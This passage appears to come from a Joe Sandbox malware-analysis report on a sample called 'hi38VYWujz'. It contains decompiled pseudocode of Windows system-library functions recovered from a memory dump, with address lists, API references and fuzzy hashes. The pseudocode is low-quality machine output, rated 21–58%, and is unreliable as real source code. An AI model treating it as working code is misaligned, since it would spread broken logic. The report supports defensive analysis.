									if( *(_t318 - 0x24) == 0xc0000017) {
										goto L69;
									}
									__eflags =  *(_t316 + 0x18);
									if( *(_t316 + 0x18) != 0) {
										_t133 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x68c1b14
										__eflags =  *_t133 -  *(_t316 + 0x18);
										if( *_t133 -  *(_t316 + 0x18) > 0) {
											goto L31;
										}
										L32:
										__eflags =  *(_t316 + 0x1c) & 0x00000004;
										if(( *(_t316 + 0x1c) & 0x00000004) != 0) {
											__eflags =  *(_t316 + 0x4c);
											if( *(_t316 + 0x4c) > 0) {
												 *(_t316 + 0x3c) = 0;
												 *((intOrPtr*)(_t316 + 0x50)) = 0;
												 *((intOrPtr*)(_t316 + 0x44)) = 0;
												 *((intOrPtr*)(_t316 + 0x48)) = 0;
												 *(_t316 + 0x4c) = 0;
												 *((intOrPtr*)(_t316 + 0x58)) = 0;
											}
										}
										goto L34;
									}
									L31:
									_t107 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x68c1b14
									 *(_t316 + 0x18) =  *_t107;
									goto L32;
								}
								 *(_t318 - 0x30) = 1;
								 *((intOrPtr*)(_t318 - 0x7c)) = 1;
								 *((intOrPtr*)(_t318 - 0x6c)) = E36B0F1F0( *((intOrPtr*)(_t318 - 0x6c)));
								 *((intOrPtr*)(_t318 - 4)) = 0;
								__eflags =  *(_t318 - 0x60);
								if( *(_t318 - 0x60) != 0) {
									_t255 =  *((intOrPtr*)(_t318 - 0x20));
									_t82 = _t255 + 0x14; // 0x68c05b0
									_t86 = _t255 + 0x10; // 0x68c1b14
									 *0x36bd91e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)),  *_t86,  *(_t318 - 0x5c),  *((intOrPtr*)(_t318 - 0x34)),  *((intOrPtr*)(_t318 - 0x70)),  *_t82);
									 *(_t318 - 0x24) =  *((intOrPtr*)(_t318 - 0x2c))();
								}
								_t244 =  *(_t318 - 0x38);
								__eflags = _t244 & 0x00000010;
								if((_t244 & 0x00000010) != 0) {
									__eflags =  *(_t316 + 0x30);
									if( *(_t316 + 0x30) != 0) {
										goto L21;
									}
									__eflags =  *(_t318 - 0x24);
									if( *(_t318 - 0x24) >= 0) {
										L64:
										 *0x36bd91e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)), 0,  *(_t318 - 0x5c),  *((intOrPtr*)(_t318 - 0x34)), 0, 0);
										 *((intOrPtr*)(_t318 - 0x2c))();
										 *(_t318 - 0x24) = 0;
										_t244 =  *(_t318 - 0x38);
										goto L21;
									}
									__eflags =  *(_t316 + 0x1c) & 0x00000004;
									if(( *(_t316 + 0x1c) & 0x00000004) != 0) {
										goto L21;
									}
									goto L64;
								} else {
									L21:
									__eflags = _t244 & 0xffffffee;
									if((_t244 & 0xffffffee) != 0) {
										 *(_t318 - 0x24) = 0;
										 *0x36bd91e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)),  *((intOrPtr*)(_t318 - 0x34)), _t244);
										 *((intOrPtr*)(_t318 - 0x2c))();
									}
									_t247 = E36AF3C40();
									__eflags = _t247;
									if(_t247 != 0) {
										_t250 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x234;
									} else {
										_t250 = 0x7ffe038e;
									}
									__eflags =  *_t250;
									if( *_t250 != 0) {
										_t175 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x68c1b14
										_t250 = E36B6C490( *_t175,  *((intOrPtr*)(_t318 - 0x54)),  *((intOrPtr*)(_t318 - 0x48)),  *((intOrPtr*)(_t318 - 0x2c)),  *(_t318 - 0x38),  *(_t318 - 0x24),  *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)));
									}
									 *((intOrPtr*)(_t318 - 4)) = 0xfffffffe;
									E36B0F1DB(_t250);
									_t228 = E36B0F1F0( *((intOrPtr*)(_t318 - 0x6c)));
									goto L26;
								}
							}
						}
						__eflags = _t284 & 0x00000010;
						if((_t284 & 0x00000010) == 0) {
							goto L37;
						}
						goto L14;
					}
					__eflags =  *(_t316 + 0x18);
					if( *(_t316 + 0x18) != 0) {
						_t120 = _t209 + 0x10; // 0x68c1b14
						__eflags =  *_t120 -  *(_t316 + 0x18);
						if( *_t120 -  *(_t316 + 0x18) > 0) {
							goto L14;
						}
						goto L40;
					}
					goto L14;
				}
			}

0x36b0ee48
0x36b0ee4a
0x36b0ee4f
0x36b0ee54
0x36b0ee56
0x36b0ee5b
0x36b0ee60
0x36b0ee63
0x36b0ee66
0x36b0ee68
0x36b0ee70
0x36b0ee73
0x36b0ee76
0x36b0ee79
0x36b0ee80
0x36b0ee85
0x36b0ee88
0x00000000
0x36b0ee8b
0x36b0ee93
0x36b0ee98
0x36b0ee9f
0x36b0eeac
0x36b0eeb8
0x36b0eeb8
0x36b0eebe
0x36b0eec6
0x36b0eec9
0x36b0eec9
0x36b0eece
0x36b0eece
0x36b0eece
0x36b0eece
0x36b0eece
0x36b0eece
0x36b0eed3
0x36b0eed6
0x36b0eedb
0x36b0eee0
0x36b0eee6
0x36b0eeee
0x36b0eeee
0x36b0eef0
0x36b0eef4
0x36b0eef6
0x00000000
0x00000000
0x36b0f1dc
0x36b0f1dc
0x36b0eefc
0x36b0eefc
0x36b0ef01
0x36b0ef03
0x36b0ef06
0x36b0ef09
0x36b0ef0c
0x36b0ef0f
0x36b0ef0f
0x36b0ef16
0x36b0ef16
0x36b0ef1b
0x36b0ef20
0x36b0ef26
0x36b0ef29
0x36b0ef2c
0x36b0ef2c
0x36b0ef36
0x36b0ef36
0x36b0ef3b
0x36b0ef40
0x36b0ef46
0x36b0ef4c
0x36b0ef54
0x36b0ef57
0x36b0ef59
0x36b0ef60
0x36b0ef63
0x36b0ef63
0x36b0ef66
0x36b0ef69
0x36b0ef6c
0x36b0f113
0x36b0f113
0x36b0f115
0x36b0f122
0x36b0f127
0x36b0f12b
0x36b4fe64
0x36b4fe6a
0x36b4fe6a
0x00000000
0x36b0f12b
0x36b0ef72
0x36b0ef74
0x00000000
0x00000000
0x36b0ef7a
0x36b0ef7d
0x36b0ef7d
0x36b0ef7d
0x36b0ef81
0x36b0f144
0x36b0f144
0x36b0f14a
0x36b4fd20
0x36b4fd23
0x36b0ef90
0x36b0ef90
0x36b0ef93
0x36b4fd2e
0x36b4fd31
0x00000000
0x00000000
0x36b4fd37
0x36b4fd45
0x36b4fd4b
0x36b4fd4b
0x36b4fd4e
0x00000000
0x00000000
0x00000000
0x36b4fd54
0x36b4fd3c
0x36b4fd3f
0x00000000
0x00000000
0x00000000
0x36b4fd3f
0x36b0ef99
0x36b0ef99
0x36b0ef9c
0x36b0f1a6
0x36b0f1a9
0x00000000
0x00000000
0x00000000
0x36b0f1af
0x36b0efa2
0x36b0efa2
0x36b0efa5
0x36b0efab
0x36b0efae
0x36b0efb4
0x36b0efba
0x36b0efc0
0x36b0efc6
0x36b0efcc
0x36b0efd8
0x36b0efde
0x36b0efe1
0x36b0efe7
0x36b0efe9
0x36b0efec
0x36b0eff3
0x36b0eff8
0x36b0effa
0x36b0efff
0x36b0f002
0x36b0f008
0x36b0f00a
0x36b0f15d
0x36b0f164
0x36b0f165
0x36b0f168
0x36b0f16b
0x36b0f16e
0x36b0f170
0x00000000
0x00000000
0x36b0f176
0x36b0f17a
0x36b0f1c8
0x36b0f1cf
0x36b0f1d0
0x36b0f1d3
0x00000000
0x36b0f1d3
0x36b0f17c
0x36b0f105
0x36b0f105
0x36b0f108
0x36b0f10a
0x36b0f1b7
0x36b0f1b7
0x36b0f110
0x00000000
0x36b0f110
0x36b0f010
0x36b0f010
0x36b0f013
0x36b0f0a2
0x36b0f0a2
0x36b0f0a6
0x36b0f186
0x36b0f186
0x36b0f0ac
0x36b0f0b0
0x36b4fe56
0x36b4fe56
0x36b0f103
0x36b0f103
0x00000000
0x36b0f103
0x36b0f0bc
0x36b0f0c3
0x36b0f0c4
0x36b0f0c7
0x36b0f0ce
0x36b4fe35
0x36b4fe35
0x36b4fe39
0x00000000
0x00000000
0x36b4fe41
0x36b4fe41
0x36b4fe42
0x36b4fe48
0x36b4fe51
0x00000000
0x36b4fe51
0x36b0f0d4
0x36b0f0db
0x00000000
0x00000000
0x36b0f0e1
0x36b0f0e5
0x36b0f193
0x36b0f199
0x36b0f19b
0x00000000
0x00000000
0x36b0f0f4
0x36b0f0f4
0x36b0f0f8
0x36b0f0fa
0x36b0f0fd
0x36b4fe1e
0x36b4fe21
0x36b4fe24
0x36b4fe27
0x36b4fe2a
0x36b4fe2d
0x36b4fe2d
0x36b0f0fd
0x00000000
0x36b0f0f8
0x36b0f0eb
0x36b0f0ee
0x36b0f0f1
0x00000000
0x36b0f0f1
0x36b0f01c
0x36b0f01f
0x36b0f02a
0x36b0f02d
0x36b0f030
0x36b0f034
0x36b0f036
0x36b0f039
0x36b0f045
0x36b0f051
0x36b0f05a
0x36b0f05a
0x36b0f05d
0x36b0f060
0x36b0f062
0x36b4fd59
0x36b4fd5c
0x00000000
0x00000000
0x36b4fd62
0x36b4fd66
0x36b4fd72
0x36b4fd84
0x36b4fd8a
0x36b4fd8d
0x36b4fd90
0x00000000
0x36b4fd90
0x36b4fd68
0x36b4fd6c
0x00000000
0x00000000
0x00000000
0x36b0f068
0x36b0f068
0x36b0f068
0x36b0f06d
0x36b4fd98
0x36b4fda8
0x36b4fdae
0x36b4fdae
0x36b0f073
0x36b0f078
0x36b0f07a
0x36b4fdbf
0x36b0f080
0x36b0f080
0x36b0f080
0x36b0f085
0x36b0f088
0x36b4fde1
0x36b4fde4
0x36b4fde4
0x36b0f08e
0x36b0f095
0x36b0f09d
0x00000000
0x36b0f09d
0x36b0f062
0x36b4fd29
0x36b0f150
0x36b0f153
0x00000000
0x00000000
0x00000000
0x36b0f155
0x36b0ef87
0x36b0ef8a
0x36b0f136
0x36b0f13c
0x36b0f13e
0x00000000
0x00000000
0x00000000
0x36b0f13e
0x00000000
0x36b0ef8a

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60da533331051b2c82f27cb5d3876fb285af0ff54ffb4b53f5efe16f7fb7b6b8
Instruction ID: 8e3205c8e995bf16edf0c8a10b1323eff714ca75cc16c4f599bab60151969d39
Opcode Fuzzy Hash: 60da533331051b2c82f27cb5d3876fb285af0ff54ffb4b53f5efe16f7fb7b6b8
Instruction Fuzzy Hash: 9BE1DFB4E10228DFEB25CFA9C980A9DBFF9FF48344F20552AE955A7220D771A841CF51

Uniqueness

Uniqueness Score: -1.00%

Function 36B5EBD0 Relevance: 6.2, APIs: 4, Instructions: 187
timeCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E36B5EBD0(void* __ebx, intOrPtr __ecx, signed char __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t84;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr _t94;
				intOrPtr _t95;
				short* _t115;
				intOrPtr* _t118;
				intOrPtr _t125;
				intOrPtr _t127;
				signed char _t128;
				intOrPtr _t132;
				intOrPtr _t135;
				intOrPtr* _t136;
				intOrPtr _t139;
				void* _t141;

				_t128 = __edx;
				_push("true");
				_push(0x36bbcc00);
				E36B37BE4(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t141 - 0x40)) = __edx;
				_t135 = __ecx;
				 *((intOrPtr*)(_t141 - 0x20)) = __ecx;
				_t118 = 2;
				 *((intOrPtr*)(_t141 - 0x28)) = _t118;
				 *(_t141 - 0x68) =  *(_t141 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t141 - 0x64)) = 0x36b5f550;
				 *((intOrPtr*)(_t141 - 0x60)) = E36B5F5D0;
				if( *((intOrPtr*)(_t141 + 0xc)) >= _t118) {
					_t115 =  *((intOrPtr*)(_t141 + 8));
					 *_t115 = 0;
					_t132 = 0;
				} else {
					_t132 = 0xc0000004;
					_t115 = 0;
				}
				 *((intOrPtr*)(_t141 - 0x1c)) = _t132;
				 *((intOrPtr*)(_t141 - 0x3c)) = _t115;
				if(_t135 == 0 || (_t128 & 0x00000002) != 0) {
					_t135 = _t141 - 0x68;
					 *((intOrPtr*)(_t141 - 0x20)) = _t135;
				}
				 *((intOrPtr*)(_t141 - 0x4c)) = _t135;
				_t84 = 0;
				_t136 =  *((intOrPtr*)(_t141 + 0x10));
				while(1) {
					 *(_t141 - 0x2c) = _t84;
					if(_t84 >= 1) {
						break;
					}
					 *((intOrPtr*)(_t141 - 0x44)) = 0x2800;
					 *(_t141 - 0x34) = 1;
					if(_t136 != 0) {
						 *_t136 = _t118;
					}
					if((_t128 & 0x00000002) != 0) {
						_t23 = 0x36ab18a4 + _t84 * 0x14; // 0x36b5eaf0
						 *0x36bd91e0();
						 *((intOrPtr*)( *_t23))();
						_t84 =  *(_t141 - 0x2c);
					}
					 *(_t141 - 4) =  *(_t141 - 4) & 0x00000000;
					_t86 = _t84 * 0x14;
					 *(_t141 - 0x38) = _t86;
					_t31 = _t86 + 0x36ab1898; // 0x36b5e9f0
					_t136 =  *_t31;
					_t118 = _t136;
					 *0x36bd91e0( *((intOrPtr*)(_t141 - 0x20)), _t141 - 0x30, _t141 - 0x50);
					_t88 =  *_t136();
					if(_t88 < 0) {
						L31:
						_t132 = _t88;
						goto L32;
					} else {
						if( *((intOrPtr*)(_t141 - 0x30)) != 0) {
							_push(_t141 - 0x24);
							_push( *((intOrPtr*)(_t141 - 0x30)));
							_push( *((intOrPtr*)(_t141 - 0x20)));
							_t136 =  *((intOrPtr*)( *(_t141 - 0x38) + 0x36ab189c));
							while(1) {
								_t118 = _t136;
								 *0x36bd91e0();
								_t88 =  *_t136();
								if(_t88 < 0) {
									goto L31;
								}
								if( *((intOrPtr*)(_t141 - 0x24)) !=  *((intOrPtr*)(_t141 - 0x30))) {
									_t94 =  *((intOrPtr*)(_t141 - 0x44));
									if(_t94 != 0) {
										_t95 = _t94 - 1;
										 *((intOrPtr*)(_t141 - 0x44)) = _t95;
										 *((intOrPtr*)(_t141 - 0x5c)) = _t95;
										_t125 =  *((intOrPtr*)(_t141 - 0x28)) +  *(_t141 - 0x34) * 0x12c;
										 *((intOrPtr*)(_t141 - 0x28)) = _t125;
										 *(_t141 - 0x34) = 1;
										 *((intOrPtr*)(_t141 - 0x58)) = 1;
										if( *((intOrPtr*)(_t141 + 0xc)) >= _t125) {
											 *_t115 = 0x12c;
											_t136 =  *((intOrPtr*)( *(_t141 - 0x38) + 0x36ab18a0));
											_t118 = _t136;
											 *0x36bd91e0( *((intOrPtr*)(_t141 - 0x20)), _t115 + 4,  *((intOrPtr*)(_t141 - 0x24)),  *((intOrPtr*)(_t141 - 0x50)),  *((intOrPtr*)(_t141 - 0x40)));
											_t88 =  *_t136();
											if(_t88 < 0) {
												goto L31;
											} else {
												_t128 =  *(_t115 + 0xc);
												if(_t128 == 0) {
													 *(_t141 - 0x34) = 0;
													 *((intOrPtr*)(_t141 - 0x58)) = 0;
													goto L28;
												} else {
													_t128 = _t128 + 0x3c;
													_t136 =  *((intOrPtr*)(_t141 - 0x20));
													_t118 = _t136;
													_t88 = E36B5F5EC(_t118, _t128, _t141 - 0x54, "true");
													if(_t88 < 0) {
														goto L31;
													} else {
														_t127 =  *(_t115 + 0xc) +  *((intOrPtr*)(_t141 - 0x54));
														 *((intOrPtr*)(_t141 - 0x48)) = _t127;
														_t128 = _t127 + 8;
														_t118 = _t136;
														_t88 = E36B5F5EC(_t118, _t128, _t115 + 0x124, "true");
														if(_t88 < 0) {
															goto L31;
														} else {
															_t128 =  *((intOrPtr*)(_t141 - 0x48)) + 0x58;
															_t118 = _t136;
															_t88 = E36B5F5EC(_t118, _t128, _t115 + 0x120, "true");
															if(_t88 < 0) {
																goto L31;
															} else {
																_t128 =  *((intOrPtr*)(_t141 - 0x48)) + 0x34;
																_t118 = _t136;
																_t88 = E36B5F5EC(_t118, _t128, _t115 + 0x128, "true");
																if(_t88 < 0) {
																	goto L31;
																} else {
																	_t115 = _t115 + 0x12c;
																	 *((intOrPtr*)(_t141 - 0x3c)) = _t115;
																	 *_t115 = 0;
																	goto L29;
																}
															}
														}
													}
												}
											}
										} else {
											_t132 = 0xc0000004;
											 *((intOrPtr*)(_t141 - 0x1c)) = 0xc0000004;
											L28:
											_t139 =  *((intOrPtr*)(_t141 - 0x20));
											L29:
											_push(_t141 - 0x24);
											_push( *((intOrPtr*)(_t141 - 0x24)));
											_push(_t139);
											_t136 =  *((intOrPtr*)( *(_t141 - 0x38) + 0x36ab189c));
											continue;
										}
									} else {
										_t132 = 0xc0000229;
										L32:
										 *((intOrPtr*)(_t141 - 0x1c)) = _t132;
									}
								}
								goto L33;
							}
							goto L31;
						}
					}
					L33:
					 *(_t141 - 4) = 0xfffffffe;
					E36B5EE16();
					_t84 =  *(_t141 - 0x2c) + 1;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t141 - 0x10));
				return _t132;
			}

0x36b5ebd0
0x36b5ebd0
0x36b5ebd2
0x36b5ebd7
0x36b5ebdc
0x36b5ebdf
0x36b5ebe1
0x36b5ebe6
0x36b5ebe7
0x36b5ebea
0x36b5ebee
0x36b5ebf5
0x36b5ebff
0x36b5ec0a
0x36b5ec0f
0x36b5ec12
0x36b5ec01
0x36b5ec01
0x36b5ec06
0x36b5ec06
0x36b5ec14
0x36b5ec17
0x36b5ec1c
0x36b5ec23
0x36b5ec26
0x36b5ec26
0x36b5ec29
0x36b5ec2c
0x36b5ec2e
0x36b5ec31
0x36b5ec31
0x36b5ec37
0x00000000
0x00000000
0x36b5ec3d
0x36b5ec44
0x36b5ec4d
0x36b5ec4f
0x36b5ec4f
0x36b5ec54
0x36b5ec59
0x36b5ec61
0x36b5ec67
0x36b5ec69
0x36b5ec69
0x36b5ec6c
0x36b5ec70
0x36b5ec73
0x36b5ec81
0x36b5ec81
0x36b5ec87
0x36b5ec89
0x36b5ec8f
0x36b5ec93
0x36b5edf0
0x36b5edf0
0x00000000
0x36b5ec99
0x36b5ec9d
0x36b5eca6
0x36b5eca7
0x36b5ecaa
0x36b5ecb0
0x36b5edde
0x36b5edde
0x36b5ede0
0x36b5ede6
0x36b5edea
0x00000000
0x00000000
0x36b5ecc1
0x36b5ecc7
0x36b5eccc
0x36b5ecd8
0x36b5ecd9
0x36b5ecdc
0x36b5ece9
0x36b5eceb
0x36b5ecf1
0x36b5ecf4
0x36b5ecfa
0x36b5ed0e
0x36b5ed24
0x36b5ed2a
0x36b5ed2c
0x36b5ed32
0x36b5ed36
0x00000000
0x36b5ed3c
0x36b5ed3c
0x36b5ed41
0x36b5edc4
0x36b5edc7
0x00000000
0x36b5ed43
0x36b5ed49
0x36b5ed4c
0x36b5ed4f
0x36b5ed51
0x36b5ed58
0x00000000
0x36b5ed5e
0x36b5ed61
0x36b5ed64
0x36b5ed70
0x36b5ed73
0x36b5ed75
0x36b5ed7c
0x00000000
0x36b5ed7e
0x36b5ed8a
0x36b5ed8d
0x36b5ed8f
0x36b5ed96
0x00000000
0x36b5ed98
0x36b5eda4
0x36b5eda7
0x36b5eda9
0x36b5edb0
0x00000000
0x36b5edb2
0x36b5edb2
0x36b5edb8
0x36b5edbd
0x00000000
0x36b5edbd
0x36b5edb0
0x36b5ed96
0x36b5ed7c
0x36b5ed58
0x36b5ed41
0x36b5ecfc
0x36b5ecfc
0x36b5ed01
0x36b5edca
0x36b5edca
0x36b5edcd
0x36b5edd0
0x36b5edd1
0x36b5edd4
0x36b5edd8
0x00000000
0x36b5edd8
0x36b5ecce
0x36b5ecce
0x36b5edf2
0x36b5edf2
0x36b5edf2
0x36b5eccc
0x00000000
0x36b5ecc1
0x00000000
0x36b5edde
0x36b5ec9d
0x36b5edf5
0x36b5edf5
0x36b5edfc
0x36b5ee04
0x36b5ee04
0x36b5ee47
0x36b5ee53

APIs

RtlDebugPrintTimes.NTDLL ref: 36B5EC61
RtlDebugPrintTimes.NTDLL ref: 36B5EC89
RtlDebugPrintTimes.NTDLL ref: 36B5ED2C
RtlDebugPrintTimes.NTDLL ref: 36B5EDE0

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 1a8ba9e1d61faf637299a36c77051af08d27a5bcc689b7ade06f1e40414ed713
Instruction ID: 8d4413b3892a91cbcdae42a1937ed4351786ae2a48dfa0761b6be173091ebc8a
Opcode Fuzzy Hash: 1a8ba9e1d61faf637299a36c77051af08d27a5bcc689b7ade06f1e40414ed713
Instruction Fuzzy Hash: 34712771E002299FDF05CFA5D984ADDBBB5FF48354F15402ADA05EB240D734A906CF58

Uniqueness

Uniqueness Score: -1.00%

Function 36BBA04A Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 36BBA0F7
RtlDebugPrintTimes.NTDLL ref: 36BBA1AA
RtlDebugPrintTimes.NTDLL ref: 36BBA1CE
RtlDebugPrintTimes.NTDLL ref: 36BBA1E3

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: b41a7ae8cf1442d040dd37fa026155824206577691b7c669b11929b8445502c7
Instruction ID: 165d9d982b164a9219f5dc5c942f9a28e526d040196e69fb4b3542f497166acf
Opcode Fuzzy Hash: b41a7ae8cf1442d040dd37fa026155824206577691b7c669b11929b8445502c7
Instruction Fuzzy Hash: 21514A74F10632DFEF48CE19C8A0A29BBE6FB8A354B644169D506DB750DBB5AC41CF80

Uniqueness

Uniqueness Score: -1.00%

Function 36B5EE56 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 36B5EEED
RtlDebugPrintTimes.NTDLL ref: 36B5EF12
RtlDebugPrintTimes.NTDLL ref: 36B5EFA4
RtlDebugPrintTimes.NTDLL ref: 36B5EFF8

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 47c7c82798cc070a1cef0c0659f86ca88942b5aa8ec157355bc742f4a0fefaa4
Instruction ID: 3955a86f710b8a8a7e054e93b98f635677e98594522c17322d2b972c0592b8ce
Opcode Fuzzy Hash: 47c7c82798cc070a1cef0c0659f86ca88942b5aa8ec157355bc742f4a0fefaa4
Instruction Fuzzy Hash: 945135B5E102299FEF04CF95D844ADDBBB6FF48354F16802AEA05BB250DB349902CF54

Uniqueness

Uniqueness Score: -1.00%

Function 36B17A4F Relevance: 6.1, APIs: 4, Instructions: 81
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E36B17A4F(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t34;
				signed int _t35;
				signed int _t40;
				intOrPtr _t42;
				void* _t50;
				intOrPtr* _t55;
				intOrPtr* _t69;
				void* _t73;

				_t63 = __edx;
				_t51 = __ebx;
				_push("true");
				_push(0x36bbc840);
				E36B37BE4(__ebx, __edi, __esi);
				_t66 = __ecx;
				 *(_t73 - 4) =  *(_t73 - 4) & 0x00000000;
				_t69 =  *0x36bd5a7c;
				_push(__edx);
				if(_t69 == 0) {
					 *0x36bd91e0();
					E36B1B490(__ecx, __edx,  *__ecx());
					_t55 =  *((intOrPtr*)(_t73 - 0x14));
					 *((intOrPtr*)(_t73 - 0x40)) =  *((intOrPtr*)( *_t55));
					 *((intOrPtr*)(_t73 - 0x24)) = _t55;
					_t34 =  *0x36bd5d38; // 0x6d662cd
					 *(_t73 - 0x30) = _t34;
					__eflags =  *0x36bd65fc; // 0x638cdfb3
					if(__eflags == 0) {
						_push(0);
						_push("true");
						_push(_t73 - 0x2c);
						_push("true");
						_push(0xffffffff);
						 *(_t73 - 0x1c) = E36B22B20();
						__eflags =  *(_t73 - 0x1c);
						if( *(_t73 - 0x1c) < 0) {
							E36B38AA0(_t55, _t63,  *(_t73 - 0x1c));
						}
						 *0x36bd65fc =  *(_t73 - 0x2c);
					}
					_t35 =  *0x36bd65fc; // 0x638cdfb3
					 *(_t73 - 0x20) = _t35;
					_push("true");
					asm("ror eax, cl");
					 *(_t73 - 0x34) =  *(_t73 - 0x30);
					_t40 =  *(_t73 - 0x34) ^  *(_t73 - 0x20);
					__eflags = _t40;
					 *(_t73 - 0x38) = _t40;
					if(__eflags == 0) {
						 *((intOrPtr*)(_t73 - 0x3c)) = E36B98890(_t51, _t63, _t66, 0, __eflags,  *((intOrPtr*)(_t73 - 0x24)), 0x36ab50b4);
						_t42 =  *((intOrPtr*)(_t73 - 0x3c));
					} else {
						 *0x36bd91e0( *((intOrPtr*)(_t73 - 0x24)));
						_t42 =  *( *(_t73 - 0x38))();
					}
					 *((intOrPtr*)(_t73 - 0x28)) = _t42;
					return  *((intOrPtr*)(_t73 - 0x28));
				} else {
					 *0x36bd91e0();
					_t50 =  *_t69();
					 *(_t73 - 4) = 0xfffffffe;
					 *[fs:0x0] =  *((intOrPtr*)(_t73 - 0x10));
					return _t50;
				}
			}

0x36b17a4f
0x36b17a4f
0x36b17a4f
0x36b17a51
0x36b17a56
0x36b17a5b
0x36b17a5d
0x36b17a61
0x36b17a67
0x36b17a6a
0x36b547f8
0x36b54801
0x36b54806
0x36b5480d
0x36b54810
0x36b54813
0x36b54818
0x36b5481d
0x36b54823
0x36b54825
0x36b54826
0x36b5482b
0x36b5482c
0x36b5482e
0x36b54835
0x36b54838
0x36b5483b
0x36b54840
0x36b54840
0x36b54848
0x36b54848
0x36b5484d
0x36b54852
0x36b5485b
0x36b54863
0x36b54865
0x36b5486b
0x36b5486b
0x36b5486e
0x36b54871
0x36b54892
0x36b54895
0x36b54873
0x36b5487b
0x36b54881
0x36b54881
0x36b54898
0x36b5489e
0x36b17a70
0x36b17a72
0x36b17a7c
0x36b548ac
0x36b548b6
0x36b548c2
0x36b548c2

APIs

RtlDebugPrintTimes.NTDLL ref: 36B17A72
BaseThreadInitThunk.KERNEL32 ref: 36B17A7C
RtlDebugPrintTimes.NTDLL ref: 36B547F8
RtlDebugPrintTimes.NTDLL ref: 36B5487B

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes$BaseInitThreadThunk
String ID:
API String ID: 4281723722-0
Opcode ID: 4d149c70221ec37620b690cd5772188287da4726021f9b8c79d73614ebb1ed25
Instruction ID: d5c1e897fe005e97b15c44f0e2df1a308982b0cf8886e23ff59438a2d0a73895
Opcode Fuzzy Hash: 4d149c70221ec37620b690cd5772188287da4726021f9b8c79d73614ebb1ed25
Instruction Fuzzy Hash: 21312775E01228EFCF05DFA9D854A9DBBF1FB48320F10416AEA11BB280DB395901CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 36AE58E0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E36AE58E0(signed int __ebx, void* __edi, signed int __esi, void* __eflags, signed int _a4) {
				void* _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				signed int _v32;
				char _v44;
				signed int _v48;
				signed int _v52;
				char _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _v84;
				char _v96;
				intOrPtr _v144;
				signed int _v160;
				signed int _v164;
				intOrPtr _v168;
				signed char _v176;
				intOrPtr _v180;
				char _v216;
				intOrPtr _v220;
				signed int _v228;
				intOrPtr* _v240;
				char _v244;
				char _v245;
				char _v246;
				char _v247;
				char _v248;
				char _v249;
				char _v250;
